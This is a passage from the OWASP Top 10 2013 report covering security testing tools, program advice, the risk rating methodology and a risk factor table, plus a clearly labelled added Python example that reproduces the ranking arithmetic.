Testing the Application: OWASP produced the Testing Guide to help developers, testers, and application security specialists understand how to efficiently and effectively test the security of web applications. This enormous guide, which had dozens of contributors, provides wide coverage of many web application security testing topics. Just as code review has its strengths, so does security testing. It's very compelling when you can prove that an application is insecure by demonstrating the exploit. There are also many security issues, particularly all the security provided by the application infrastructure, that simply cannot be seen by a code review, since the application is not providing all of the security itself.

Application Penetration Testing Tools: WebScarab, which was one of the most widely used of all OWASP projects, and the new ZAP, which now is far more popular, are both web application testing proxies. Such tools allow security analysts and developers to intercept web application requests, so they can figure out how the application works, and then submit test requests to see if the application responds securely to such requests. These tools are particularly effective at assisting in identifying XSS flaws, Authentication flaws, and Access Control flaws. ZAP even has an active scanner built in, and best of all it's FREE!


+O What's Next for Organizations

Start Your Application Security Program Now

Application security is no longer optional. Between increasing attacks and regulatory pressures, organizations must establish an effective capability for securing their applications.


Manage with Metrics: Drive improvement and funding decisions based on the metrics and analysis data captured. Metrics include adherence to security practices / activities, vulnerabilities introduced, vulnerabilities mitigated, application coverage, defect density by type and instance counts, etc.

• Analyze data from the implementation and verification activities to look for root cause and vulnerability patterns to drive strategic and systemic improvements across the enterprise.


+R Note About Risks

It's About Risks, Not Weaknesses

Although the 2007 and earlier versions of the OWASP Top 10 focused on identifying the most common "vulnerabilities," the OWASP Top 10 has always been organized around risks. This has caused some understandable confusion on the part of people searching for an airtight weakness taxonomy. The OWASP Top 10 for 2010 clarified the risk-focus in the Top 10 by being very explicit about how threat agents, attack vectors, weaknesses, technical impacts, and business impacts combine to produce risks. This version of the OWASP Top 10 follows the same methodology.

The Risk Rating methodology for the Top 10 is based on the OWASP Risk Rating Methodology. For each Top 10 item, we estimated the typical risk that each weakness introduces to a typical web application by looking at common likelihood factors and impact factors for each common weakness. We then rank ordered the Top 10 according to those weaknesses that typically introduce the most significant risk to an application.

The OWASP Risk Rating Methodology defines numerous factors to help calculate the risk of an identified vulnerability. However, the Top 10 must talk about generalities, rather than specific vulnerabilities in real applications. Consequently, we can never be as precise as system owners can be when calculating risks for their application(s). You are best equipped to judge the importance of your applications and data, what your threat agents are, and how your system has been built and is being operated.

Our methodology includes three likelihood factors for each weakness (prevalence, detectability, and ease of exploit) and one impact factor (technical impact). The prevalence of a weakness is a factor that you typically don't have to calculate. For prevalence data, we have been supplied prevalence statistics from a number of different organizations (as referenced in the Acknowledgements section on page 3) and we have averaged their data together to come up with a Top 10 likelihood of existence list by prevalence. This data was then combined with the other two likelihood factors (detectability and ease of exploit) to calculate a likelihood rating for each weakness. This was then multiplied by our estimated average technical impact for each item to come up with an overall risk ranking for each item in the Top 10.

Note that this approach does not take the likelihood of the threat agent into account. Nor does it account for any of the various technical details associated with your particular application. Any of these factors could significantly affect the overall likelihood of an attacker finding and exploiting a particular vulnerability. This rating also does not take into account the actual impact on your business. Your organization will have to decide how much security risk from applications the organization is willing to accept given your culture, industry, and regulatory environment. The purpose of the OWASP Top 10 is not to do this risk analysis for you.

The following illustrates our calculation of the risk for A3: Cross-Site Scripting, as an example. XSS is so prevalent it warranted the only 'VERY WIDESPREAD' prevalence value of 0. All other risks ranged from widespread to uncommon (value 1 to 3).

(Figure: risk calculation for A3 Cross-Site Scripting. Threat Agents: App Specific. Attack Vectors: Exploitability. Security Weakness: Prevalence VERY WIDESPREAD, Detectability EASY. Technical Impacts: Impact MODERATE. Business Impacts: App / Business Specific. The exploitability value and the numbers in the figure did not survive extraction.)
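The ranking step, reproduced as an added example over the factor values in this document's risk factor summary table (this is not OWASP's own calculation). Assumptions: each factor is scored Easy/Widespread/Severe = 1, Average/Common/Moderate = 2, Difficult/Uncommon/Minor = 3, with VERY WIDESPREAD = 0 as stated above; the three likelihood factors are averaged (the text only says "combined") before multiplying by technical impact; a lower score means a more significant risk.

```python
"""Reproduce the Top 10 ordering from the qualitative risk factors.

Added example for the risk rating passage; not OWASP's calculation code.
Assumed: 1-to-3 numeric scale per factor (VERY WIDESPREAD = 0 as stated),
likelihood = average of the three likelihood factors, risk = likelihood
times technical impact, lower score = more significant risk."""

SCALE = {
    "VERY WIDESPREAD": 0,                   # stated in the text: only XSS
    "EASY": 1, "WIDESPREAD": 1, "SEVERE": 1,
    "AVERAGE": 2, "COMMON": 2, "MODERATE": 2,
    "DIFFICULT": 3, "UNCOMMON": 3, "MINOR": 3,
}

# (item, exploitability, prevalence, detectability, technical impact),
# copied from the 2013 risk factor summary table in this document.
TOP10 = [
    ("A1 Injection", "EASY", "COMMON", "AVERAGE", "SEVERE"),
    ("A2 Broken Authentication", "AVERAGE", "WIDESPREAD", "AVERAGE", "SEVERE"),
    ("A3 XSS", "AVERAGE", "VERY WIDESPREAD", "EASY", "MODERATE"),
    ("A4 Insecure Direct Object References", "EASY", "COMMON", "EASY", "MODERATE"),
    ("A5 Security Misconfiguration", "EASY", "COMMON", "EASY", "MODERATE"),
    ("A6 Sensitive Data Exposure", "DIFFICULT", "UNCOMMON", "AVERAGE", "SEVERE"),
    ("A7 Missing Function Level Access Control", "EASY", "COMMON", "AVERAGE", "MODERATE"),
    ("A8 CSRF", "AVERAGE", "COMMON", "EASY", "MODERATE"),
    ("A9 Components with Known Vulnerabilities", "AVERAGE", "WIDESPREAD", "DIFFICULT", "MODERATE"),
    ("A10 Unvalidated Redirects and Forwards", "AVERAGE", "UNCOMMON", "EASY", "MODERATE"),
]

def likelihood(exploitability: str, prevalence: str, detectability: str) -> float:
    """Combine the three likelihood factors; averaging is our assumption."""
    return (SCALE[exploitability] + SCALE[prevalence] + SCALE[detectability]) / 3

def risk_score(item) -> float:
    """Likelihood times technical impact, rounded so equal scores tie cleanly."""
    _, expl, prev, det, impact = item
    return round(likelihood(expl, prev, det) * SCALE[impact], 2)

def ranked(items=TOP10):
    """Lower score first; the stable sort keeps the table's order for ties."""
    return sorted(items, key=risk_score)

if __name__ == "__main__":
    for item in ranked():
        print(f"{risk_score(item):.2f}  {item[0]}")
```

Under these assumptions the scores reproduce the A1 to A10 order of the table, with A1/A2, A4/A5/A6, A7/A8 and A9/A10 tied.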


+F Details About Risk Factors

Top 10 Risk Factor Summary

The following table presents a summary of the 2013 Top 10 Application Security Risks, and the risk factors we have assigned to each risk. These factors were determined based on the available statistics and the experience of the OWASP Top 10 team. To understand these risks for a particular application or organization, you must consider your own specific threat agents and business impacts. Even egregious software weaknesses may not present a serious risk if there are no threat agents in a position to perform the necessary attack or the business impact is negligible for the assets involved.

RISK               | Threat Agents | Attack Vectors | Security Weakness                | Technical Impacts | Business Impacts
                   |               | Exploitability | Prevalence      | Detectability  | Impact            |
A1 Injection       | App Specific  | EASY           | COMMON          | AVERAGE        | SEVERE            | App Specific
A2 Broken Auth     | App Specific  | AVERAGE        | WIDESPREAD      | AVERAGE        | SEVERE            | App Specific
A3 XSS             | App Specific  | AVERAGE        | VERY WIDESPREAD | EASY           | MODERATE          | App Specific
A4 Insecure DOR    | App Specific  | EASY           | COMMON          | EASY           | MODERATE          | App Specific
A5 Misconfig       | App Specific  | EASY           | COMMON          | EASY           | MODERATE          | App Specific
A6 Sens. Data      | App Specific  | DIFFICULT      | UNCOMMON        | AVERAGE        | SEVERE            | App Specific
A7 Function Level  | App Specific  | EASY           | COMMON          | AVERAGE        | MODERATE          | App Specific
A8 CSRF            | App Specific  | AVERAGE        | COMMON          | EASY           | MODERATE          | App Specific
A9 Components      | App Specific  | AVERAGE        | WIDESPREAD      | DIFFICULT      | MODERATE          | App Specific
A10 Redirects      | App Specific  | AVERAGE        | UNCOMMON        | EASY           | MODERATE          | App Specific

Additional Risks to Consider

The Top 10 cover a lot of ground, but there are many other risks you should consider and evaluate in your organization. Some of these have appeared in previous versions of the Top 10, and others have not, including new attack techniques that are being identified all the time. Other important application security risks (in alphabetical order) that you should also consider include:

Clickjacking
Concurrency Flaws
Denial of Service (Was 2004 Top 10 – Entry 2004-A9)


Expression Language Injection (CWE-917)
Information Leakage and Improper Error Handling (Was part of 2007 Top 10 – Entry 2007-A6)
Insufficient Anti-automation (CWE-799)
Insufficient Logging and Accountability (Related to 2007 Top 10 – Entry 2007-A6)
Lack of Intrusion Detection and Response
Malicious File Execution (Was 2007 Top 10 – Entry 2007-A3)
Mass Assignment (CWE-915)
User Privacy
